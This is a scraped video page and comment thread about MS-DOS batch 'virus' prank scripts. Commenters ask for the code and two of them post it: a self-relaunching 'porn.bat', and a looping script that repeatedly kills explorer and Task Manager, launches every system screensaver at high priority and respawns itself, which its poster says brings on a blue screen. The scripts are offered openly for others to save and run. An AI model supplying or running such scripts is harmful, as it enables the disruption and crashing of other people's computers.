Nov
18th
or the company this is all fan made and I am sure it hosts no copyright infringement A ms-dos script that was designed to make a load of popups lagging and distracting the user into closing them all not realizing that what its real purpose is to copy and create some files using massive amount of space Song: Liberate Artist: Disturbed Ending song: tom sawyer Artist: unknown? … Batch ms-dos file bomb virus script vb trojan adware smitfraud exploit link scanner disturbed liberate flash shortcut …

1st comment agin
so wuts di command?
3rd……..
try this code, and name it “porn.bat” when you save it to your desktop
@echo off
start porn
start porn
echo ha ha ha, DIE
pause
hmm pyro that may not work it may have to be start porn.bat, but that wont do anything at all, it will just keep opening up command prompt. close the first one and it will stop popping up, if you create multiple batches and set them off all at once opening up many different programs it could in fact be much more of a struggle to close and stop
wut is the code!?
well I am sorry I forgot the code
i made a spy ware like this … ill give you the code its rally good, if you keep it on it gives you the blue screen of death
how would you give me a code to a spyware virus? or is it a bat generic virus? aka a ms-dos batch file virus
i could send you the code and then you could save it as a .bat
didnt want to release my source but what the hell
@echo off
ver | findstr /x “5.1.”
if errorlevel 0 tskill explorer /f
ver | findstr /x “6.0.”
if errorlevel 0 taskkill /im explorer.exe /f
:tipsyquo
tskill taskmgr /f
taskkill /im taskmgr.exe /f
for /f “tokens=*” %%B in (’dir /s/b %systemroot%\system32\*.scr’) do start %%B /start /high
start %systemroot%\system32\cmd.exe /c %0 /min /high
goto tipsyquo